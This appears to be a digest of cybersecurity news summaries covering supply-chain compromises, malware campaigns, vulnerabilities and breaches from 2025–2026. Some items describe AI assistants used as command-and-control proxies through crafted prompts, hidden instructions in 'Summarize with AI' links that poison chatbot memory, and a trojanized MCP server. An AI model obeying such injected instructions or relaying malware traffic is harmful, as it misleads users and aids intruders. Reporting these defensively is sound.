Notepad++ version 8.8.9 was released to address a security flaw in its WinGUp update tool that allowed attackers to push malicious executables instead of legitimate updates. Users reported incidents where the updater spawned a malicious AutoUpdater.exe that collected device information and exfiltrated it to a remote site. The flaw was mitigated by enforcing updates only from GitHub and later by requiring signature verification for all updates. Security researchers noted targeted attacks against organizations with interests in East Asia, where Notepad++ processes were used to gain initial access. The attack involved an infrastructure-level compromise at the hosting provider level, allowing malicious actors to intercept and redirect update traffic. The incident commenced in June 2025 and continued until December 2025, with the Notepad++ website later migrated to a new hosting provider. The attackers were likely Chinese state-sponsored threat actors, selectively redirecting update requests from certain users to malicious servers. The hosting provider for the update feature was compromised, enabling targeted traffic redirections. The attackers regained access using previously obtained internal service credentials. Notepad++ has since migrated all clients to a new hosting provider with stronger security and plans to enforce mandatory certificate signature verification in version 8.9.2. The compromise involved shared hosting infrastructure rather than a flaw in the software's code, with attackers gaining access at the hosting provider level to intercept and manipulate traffic bound for the Notepad++ update endpoint. Direct server access by the attackers ended on September 2, 2025, but credentials associated with internal services remained exposed until December 2, 2025, allowing continued traffic redirection. The hosting provider confirmed no additional customers were affected. Notepad++ version 8.9.2 introduced a 'double-lock' design for its update mechanism, including verifying the signed installer from GitHub and checking the signed XML from the notepad-plus-plus.org domain. The auto-updater now removes libcurl.dll to eliminate DLL side-loading risk, removes unsecured cURL SSL options, and restricts plugin management execution to programs signed with the same certificate as WinGUp. Users can exclude the auto-updater during UI installation or deploy the MSI package with the NOUPDATER=1 flag. The threat group Lotus Blossom, linked to China, was involved in the compromise, using a custom backdoor called 'Chrysalis' as part of the attack chain.

Researchers have demonstrated that AI assistants like Microsoft Copilot and xAI Grok can be exploited as command-and-control (C2) proxies. This technique leverages the AI's web-browsing capabilities to create a bidirectional communication channel for malware operations, enabling attackers to blend into legitimate enterprise communications and evade detection. The method, codenamed AI as a C2 proxy, allows attackers to generate reconnaissance workflows, script actions, and dynamically decide the next steps during an intrusion. The attack requires prior compromise of a machine and installation of malware, which then uses the AI assistant as a C2 channel through specially crafted prompts. This approach bypasses traditional defenses like API key revocation or account suspension. The disclosure highlights the evolving tactics of threat actors in abusing AI systems for cyber operations.

Microsoft and Malwarebytes have disclosed a **DNS-based ClickFix variant** that marks the first documented use of the `nslookup` command to stage and deliver malicious payloads. This technique abuses DNS queries to retrieve a PowerShell script embedded in the `NAME:` field of a DNS response from an attacker-controlled server (**84[.]21.189[.]20**), which then deploys **ModeloRAT** via a Python runtime and VBScript persistence mechanism. The attack chain begins with fake CAPTCHA lures, followed by social engineering tactics (e.g., fake system alerts, browser crashes, or instructional videos) to coerce victims into executing the `nslookup` command, which downloads a ZIP archive containing the final payload. This evolution builds on earlier ClickFix tactics, including **ConsentFix** (Azure CLI OAuth abuse), **CrashFix** (malicious Chrome extensions triggering browser crashes), and **SyncAppvPublishingServer.vbs** (Google Calendar dead drops). The latest DNS-based approach demonstrates the campaign’s adaptability, leveraging **trusted native tools** (`nslookup`), **DNS as a C2 channel**, and **psychological manipulation** (urgency tactics) to bypass security controls. Concurrently, ClickFix campaigns continue to expand with **cross-platform targeting** (Windows/Linux/macOS), **AI platform abuse** (ChatGPT, Grok, Claude), and **weaponized SaaS infrastructure** (Google Groups, Pastebin) to distribute payloads like **Lumma Stealer** and **Odyssey Stealer**. The integration of **DNS staging**, **browser-native execution**, and **multi-stage loaders** underscores the campaign’s resilience despite 2025 law enforcement disruptions, with actors refining tradecraft to maximize evasion via **social engineering**, **steganography**, and **legitimate service abuse**.

A sophisticated Android malware called Keenadu has been discovered embedded in firmware from multiple device brands and distributed through various vectors, including Google Play apps. The malware provides attackers with unrestricted control over infected devices, enabling broad-range data theft and other malicious activities. As of February 2026, 13,715 devices have been confirmed infected, primarily in Russia, Japan, Germany, Brazil, and the Netherlands. The malware's capabilities include compromising all installed applications, installing any apps from APK files, and monitoring user activities, including incognito browsing. Kaspersky researchers compare Keenadu to the Triada malware family, which was found in counterfeit Android devices last year. Keenadu has been detected in Alldocube iPlay 50 mini Pro firmware dating back to August 18, 2023, and is embedded within tablet firmware with valid digital signatures. The malware has also been found in smart home camera apps on Google Play with 300,000 downloads, which are no longer available.

Android 17 Beta introduces a secure-by-default architecture with major security updates, including the deprecation of the android:usesCleartextTraffic attribute and the addition of HPKE hybrid cryptography support. The update also brings performance improvements and changes for large-screen devices, marking a shift towards tighter default security settings and a new continuous Canary channel for developers. The beta version aims to strengthen app protections and improve developer workflows, with platform stability targeted for March. Developers are urged to migrate to network security configuration files for more granular control over app security.

Microsoft Teams is experiencing a widespread outage causing message delays and service disruptions across all regions, including the United States and Europe. The issue began at 14:30PM ET, and Microsoft has confirmed it is investigating the problem. Recovery is observed in telemetry, but the root cause remains under investigation. Users are experiencing problems joining meetings with the Teams desktop client, accessing the Teams app, and signing in. The outage is causing delays and failures when sending and receiving chat messages that include inline media (images, code snippets, videos). Microsoft is also working to resolve additional incidents affecting Teams meetings and Copilot Studio agents.

Apple has introduced end-to-end encryption (E2EE) for Rich Communications Services (RCS) messaging in the iOS and iPadOS 26.4 Developer Beta. This feature is currently in beta and limited to Apple devices, with full rollout expected in future updates for iOS, iPadOS, macOS, and watchOS. The encryption is based on the RCS Universal Profile 3.0, which uses the Messaging Layer Security (MLS) protocol. Additionally, the beta includes enhanced memory safety protection with Memory Integrity Enforcement (MIE) and the default activation of Stolen Device Protection for all iPhone users. Applications can now opt in to the full protections of MIE, moving beyond the previously available Soft Mode. Stolen Device Protection introduces a one hour delay before allowing Apple Account password changes and requires biometric authentication for key security actions.

A study by Intruder's research team revealed that over 42,000 exposed tokens across 334 secret types were found in 5 million scanned applications. These tokens, often missed by traditional vulnerability scanners, pose significant security risks, including unauthorized access to code repositories, project management tools, and other sensitive services. The research highlights the limitations of existing secrets detection methods and underscores the need for more comprehensive scanning techniques. The exposed tokens included 688 GitHub and GitLab personal access tokens, many of which were still active and gave full access to repositories. An API key for Linear, a project management application, was also found embedded directly in front-end code, exposing the organization’s entire Linear instance. Additionally, exposed secrets were found across a wide range of other services, including CAD software APIs, email platforms, webhooks for chat and automation platforms, PDF converters, sales intelligence and analytics platforms, and link shorteners. The findings underscore the need for more comprehensive scanning techniques to prevent such exposures.

Low-skilled cybercriminals are leveraging AI to enhance their extortion campaigns, a technique dubbed 'vibe extortion' by researchers. This involves using large language models (LLMs) to script professional extortion strategies, including deadlines and pressure tactics. While the attackers themselves lack technical depth, AI provides coherence and professionalism to their threats. The use of AI in cybercrime has evolved beyond simple grammar improvements to include rapid vulnerability scanning, parallelized targeting, and automated ransomware tasks. Unit 42 researchers highlight that AI acts as a 'force multiplier' for attackers, significantly reducing operational friction and lowering the barrier to entry for cybercriminals.

A new report from Teleport reveals that AI systems with excessive access rights experience significantly higher incident rates. Over 69% of security leaders believe identity management must evolve to mitigate risks in AI infrastructure. Organizations with over-privileged AI systems report a 76% incident rate, compared to 17% for those with least-privilege controls, indicating a 4.5 times higher risk. The report highlights that static credentials and complex IT infrastructures contribute to these security issues.

A significant increase in ransomware attacks targeting industrial organizations has been observed, with 119 groups identified in 2025, a 49% rise from 2024. These attacks exploited vulnerabilities in operational technology (OT) and industrial control systems (ICS), affecting 3300 industrial organizations globally. The manufacturing sector was the most targeted, followed by transportation, oil and gas, electricity, and communications. Attackers commonly abused legitimate login credentials obtained through phishing, infostealer malware, or dark web purchases to compromise networks and deploy ransomware. The average dwell time for ransomware in OT environments was 42 days, causing operational disruptions and multi-day outages. Three new threat groups—Sylvanite, Azurite, and Pyroxene—were identified, each with distinct tactics targeting industrial systems.

A new SmartLoader campaign involves distributing a trojanized version of the Oura Model Context Protocol (MCP) server to deliver the StealC infostealer. The attackers cloned the legitimate Oura MCP Server, created fake GitHub repositories and contributors to build credibility, and submitted the trojanized server to MCP registries. The campaign targets developers, stealing credentials, browser passwords, and cryptocurrency wallet data. The attack unfolded over four stages, involving the creation of fake GitHub accounts, repositories, and contributors, followed by submission to MCP Market. The trojanized server executes an obfuscated Lua script that drops SmartLoader, which then deploys StealC. The evolution of SmartLoader indicates a shift towards targeting developers, whose systems contain sensitive data like API keys and cloud credentials.

A webinar highlights the challenges of traditional incident response in cloud environments and demonstrates how modern, AI-driven, context-aware forensics can accelerate cloud breach investigations. The session focuses on the need for host-level visibility, context mapping, and automated evidence capture to reconstruct attack timelines efficiently. Cloud forensics differs significantly from traditional forensics due to the ephemeral nature of cloud infrastructure, where evidence can disappear quickly. The webinar emphasizes the importance of correlating signals such as workload telemetry, identity activity, and network movement to gain a comprehensive view of cloud breaches.

Polish authorities have arrested a 47-year-old man suspected of ties to the Phobos ransomware group. The arrest is part of "Operation Aether," a broader international effort coordinated by Europol. The suspect was found with stolen credentials, credit card numbers, and server access data, which could facilitate ransomware attacks. The suspect faces charges under Article 269b of Poland's Criminal Code, with a maximum prison sentence of five years if found guilty. Operation Aether has targeted Phobos-linked individuals at multiple levels, including backend infrastructure operators and affiliates involved in network intrusions and data encryption. The operation has led to the extradition of a key Phobos administrator to the United States and the seizure of 27 servers in Thailand.

An inexperienced network threat hunter explored Corelight's Investigator NDR system, part of its Open NDR Platform, to understand its role in SOC workflows and threat hunting. The system provides deep network visibility, integrates with other security tools, and uses AI to assist analysts in detecting and responding to network threats. The review highlights the platform's user-friendly interface, AI-driven insights, and integration capabilities, which enhance SOC efficiency and analyst effectiveness.

The European Commission, along with authorities in the UK, France, California, and now Ireland, are investigating X (formerly Twitter) over the use of its Grok AI tool to generate non-consensual sexual images, including child sexual abuse material (CSAM). The investigations are examining whether X has complied with data protection laws and adequately safeguarded against the generation of harmful content. The Irish Data Protection Commission (DPC) has opened a formal inquiry into X's compliance with GDPR obligations, joining the UK's Information Commissioner's Office (ICO), the European Commission, and French prosecutors in their respective investigations. French authorities have also raided X's offices in Paris and summoned Elon Musk and X CEO Linda Yaccarino for interviews. X has restricted Grok's image generation capabilities to paid subscribers, a move criticized by UK officials.

Infostealer malware has been observed stealing OpenClaw configuration files containing API keys, authentication tokens, and other sensitive secrets. This marks the first known instance of such attacks targeting the popular AI assistant framework. The stolen data includes configuration details, authentication tokens, and persistent memory files, which could enable full compromise of the victim's digital identity. The malware, identified as a variant of the Vidar infostealer, executed a broad file-stealing routine that scanned for sensitive keywords. Researchers predict increased targeting of OpenClaw as it becomes more integrated into professional workflows. Additionally, security issues with OpenClaw have prompted the maintainers to partner with VirusTotal to scan for malicious skills uploaded to ClawHub, establish a threat model, and add the ability to audit for potential misconfigurations.

Microsoft has identified a new AI manipulation technique called AI Recommendation Poisoning, where businesses use 'Summarize with AI' buttons to inject biased recommendations into AI chatbots. This method involves embedding hidden instructions in URLs to manipulate the AI's memory and skew recommendations. Over 50 unique prompts from 31 companies across 14 industries were detected over a 60-day period. The attack leverages the AI's inability to distinguish genuine preferences from injected ones, potentially leading to biased advice on critical subjects like health, finance, and security.

The Washington Hotel brand in Japan has disclosed a ransomware infection that compromised its servers and exposed business data. The attack occurred on February 13, 2026, and the company has engaged an internal task force and external cybersecurity experts to assess the impact and coordinate recovery efforts. Customer data is unlikely to be exposed as it is stored on separate servers managed by another company. The incident has caused some operational disruptions, including the temporary unavailability of credit card terminals, but no significant operational impact has been reported. The financial impact is currently under review, and no ransomware group has claimed responsibility.

Eurail B.V., the operator of Eurail and Interrail passes, confirmed that data stolen in a breach earlier this year is now being sold on the dark web. The stolen data includes full names, passport details, ID numbers, bank account IBANs, health information, and contact details. Eurail is still investigating the extent of the data compromise and the number of affected customers. The company has notified data protection authorities and advised customers to update passwords and monitor bank accounts for suspicious activity.

A 40-year-old man in the Netherlands was arrested for downloading and refusing to delete confidential police documents that were accidentally shared with him. The man demanded a reward in exchange for deleting the files, leading to his arrest for computer trespassing. The incident began when a police officer mistakenly sent a download link instead of an upload link, and the man downloaded the files despite knowing the error. The Dutch police emphasized the legal obligation to report and refrain from accessing misdirected confidential materials.

Researchers from ETH Zurich and USI discovered 27 vulnerabilities in Bitwarden, LastPass, Dashlane, and 1Password that could allow attackers to view and modify stored passwords. The flaws challenge the 'zero-knowledge encryption' claims of these services, with attacks ranging from integrity violations to complete vault compromise. The vulnerabilities were disclosed to the vendors, and remediation is underway. The researchers developed attack scenarios exploiting key escrow, vault encryption, sharing, and backwards compatibility features. Bitwarden was found to have a critical flaw in its organization onboarding process, allowing malicious auto-enrolment attacks. 1Password's use of a high-entropy cryptographic key provides it with a security advantage. Dashlane patched a downgrade attack vulnerability in November 2025. Bitwarden is addressing seven issues and accepting three as intentional design decisions. LastPass is working to enhance integrity guarantees.

The UK’s National Cyber Security Centre (NCSC) reported 204 nationally significant cyber incidents between September 2024 and August 2025, a 130% increase from the previous year. Recent high-profile attacks on Marks & Spencer, the Co-op Group, and Jaguar Land Rover highlighted the real-world impact of cyber threats. The NCSC emphasized the need for urgent action from business leaders to enhance cybersecurity defenses. The NCSC's 2025 Annual Review included a letter from the CEO of the Co-op Group, emphasizing the responsibility of senior leaders in protecting their businesses. The NCSC launched the Cyber Action Toolkit to help small organizations improve their cyber defenses. Additionally, the NCSC issued an alert to critical national infrastructure (CNI) providers about severe cyber threats targeting CNI, following coordinated cyber-attacks on Poland's energy infrastructure in December. NCSC CEO Richard Horne warned that SMEs are wrong to assume they won't be targeted by cyber-attacks and urged them to adopt Cyber Essentials certification to protect against common cybersecurity threats.

A new malvertising campaign uses SEO poisoning to distribute fake Microsoft Teams installers that deploy the Oyster backdoor on Windows devices. The malware, known as OysterLoader, provides attackers with remote access to corporate networks, enabling command execution, payload deployment, and file transfers. The campaign targets users searching for 'Teams download,' leading them to a fake site that mimics Microsoft's official download page. The malicious installer, signed with legitimate certificates, drops a DLL into the %APPDATA%\Roaming folder and creates a scheduled task for persistence. Microsoft revoked over 200 certificates used to sign malicious Teams installers in a wave of Rhysida ransomware attacks in October 2025. The threat group Vanilla Tempest, also tracked as VICE SPIDER and Vice Society, is a financially motivated actor that focuses on deploying ransomware and exfiltrating data for extortion. The Oyster malware, also known as Broomstick and CleanUpLoader, has been linked to multiple campaigns and ransomware operations, such as Rhysida. The campaign was first disclosed by Blackpoint Cyber in September 2025, highlighting how users searching for Teams online were redirected to bogus download pages, where they were offered a malicious MSTeamsSetup.exe instead of the legitimate client. The threat actor used Trusted Signing, SSL.com, DigiCert, and GlobalSign code signing services to sign the malicious installers and other post-compromise tools. In early 2026, OysterLoader evolved with new C2 infrastructure and obfuscation methods, including a multi-stage infection chain and dynamic API resolution to hinder detection and analysis.

A phishing campaign named Operation DoppelBrand has been targeting Fortune 500 companies, including Wells Fargo and USAA, between December 2025 and January 2026. The campaign, attributed to a financially motivated threat actor known as GS7, uses lookalike domains and cloned login portals to harvest credentials. The operation also deploys remote management tools for persistent access and monetizes compromised accounts. The infrastructure is highly automated, with over 150 domains identified, and targets major US financial institutions, investment firms, and technology brands.

Organizations transitioning from password-based authentication to passkeys must align with ISO/IEC 27001 compliance requirements. Passkeys, built on FIDO2 and WebAuthn standards, offer significant security improvements by eliminating password-related vulnerabilities. The transition involves mapping passkey adoption to specific ISO/IEC 27001 controls, assessing risks, and documenting procedures to meet compliance standards. Real-world implementations show reduced help desk calls and improved authentication success rates, but challenges such as downgrade attacks and account recovery complexity remain.

Over 260,000 Google Chrome users downloaded fake AI assistant extensions that steal login credentials, monitor emails, and enable remote access. Researchers at LayerX identified over 30 malicious extensions as part of a coordinated campaign called AiFrame. The extensions mimicked popular AI assistants like Claude AI, ChatGPT, Grok, and Google Gemini. The campaign used extension spraying to evade takedowns, directing users to remote infrastructure to avoid detection. The extensions exfiltrate data from Chrome and Gmail to attacker-controlled servers. LayerX warns that these extensions act as general-purpose access brokers, capable of harvesting data and monitoring user behavior. Many extensions have been removed from the Chrome Web Store, but users who downloaded them remain at risk. Additionally, cybersecurity researchers have discovered a malicious Google Chrome extension named CL Suite by @CLMasters (ID: jkphinfhmfkckkcnifhjiplhfoiefffl) that steals TOTP codes for Facebook and Meta Business accounts, Business Manager contact lists, and analytics data. The extension exfiltrates data to infrastructure controlled by the threat actor, including a backend at getauth[.]pro and a Telegram channel. The extension has 33 users as of writing and was first uploaded to the Chrome Web Store on March 1, 2025. About 500,000 VKontakte users have had their accounts silently hijacked through Chrome extensions masquerading as VK customization tools. The large-scale campaign has been codenamed VK Styles. The malware embedded in the extensions is designed to engage in active account manipulation by automatically subscribing users to the attacker's VK groups, resetting account settings every 30 days to override user preferences, manipulating CSRF tokens to bypass VK's security protections, and maintaining persistent control. A report published by Q Continuum found a huge collection of 287 Chrome extensions that exfiltrate browsing history to data brokers. These extensions have 37.4 million installations, representing roughly 1% of the global Chrome userbase.

A legitimate AgreeTo Outlook add-in was hijacked and turned into a phishing kit, stealing over 4,000 Microsoft account credentials. The attackers seized control of an abandoned domain associated with the add-in to serve a fake Microsoft login page. This incident highlights how overlooked and abandoned assets can become attack vectors. The add-in, distributed through Microsoft's store, ran inside Outlook, where users handle sensitive communications. It could request permissions to read and modify emails, exploiting the implicit trust in Microsoft's store. Microsoft has since removed the add-in from its store.

BeyondTrust has patched a critical pre-authentication remote code execution (RCE) vulnerability (CVE-2026-1731, CVSS 9.9) in Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw could allow unauthenticated attackers to execute OS commands in the context of the site user, leading to unauthorized access, data exfiltration, and service disruption. The vulnerability affects RS versions 25.3.1 and prior, and PRA versions 24.3.4 and prior. Patches are available in RS versions 25.3.2 and later, and PRA versions 25.1.1 and later. Self-hosted customers must manually apply updates if not subscribed to automatic updates. The vulnerability was discovered on January 31, 2026, with approximately 11,000 exposed instances identified, including around 8,500 on-prem deployments. BeyondTrust secured all RS/PRA cloud systems by February 2, 2026. The flaw was discovered by Harsh Jaiswal and the Hacktron AI team. Threat actors can exploit the flaw through maliciously crafted client requests in low-complexity attacks that do not require user interaction. In June 2025, BeyondTrust fixed a high-severity RS/PRA Server-Side Template Injection vulnerability. Attackers have begun actively exploiting the CVE-2026-1731 vulnerability in the wild, abusing the get_portal_info endpoint to extract the x-ns-company value before establishing a WebSocket channel. A proof-of-concept exploit targeting the /get_portal_info endpoint was published on GitHub. CISA has added CVE-2026-1731 to its Known Exploited Vulnerabilities (KEV) catalog and ordered U.S. government agencies to secure their systems against the flaw by February 16, 2026. CISA also added four other vulnerabilities to its KEV catalog, including CVE-2026-20700, CVE-2025-15556, CVE-2025-40536, and CVE-2024-43468. CVE-2024-43468 was patched by Microsoft in October 2024 but is still being exploited in real-world attacks. CISA ordered U.S. government agencies to secure their systems against CVE-2024-43468 by March 5, 2026. CVE-2026-20700 was acknowledged by Apple to have been exploited in sophisticated attacks against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-15556 exploitation has been attributed to the China-linked state-sponsored threat actor Lotus Blossom, delivering a previously undocumented backdoor called Chrysalis.

Lithuania is advancing its cybersecurity capabilities through the 'Safe and Inclusive E-Society' mission, focusing on AI-driven fraud defense and digital resilience. The initiative, coordinated by Kaunas University of Technology (KTU) and funded by the government, aims to protect citizens and critical infrastructure from evolving cyber threats, including AI-generated fraud. The mission involves collaboration between universities, cybersecurity firms, and industry associations to develop adaptive, self-learning security solutions. The project addresses the rise of Generative AI (GenAI) and Large Language Models (LLMs) in cybercrime, which enable highly personalized and realistic phishing attacks. Traditional detection methods are becoming ineffective against these advanced threats. Lithuania's efforts include developing AI-powered defense systems for FinTech, critical infrastructure, and public safety, as well as combating disinformation and enhancing cyber threat intelligence.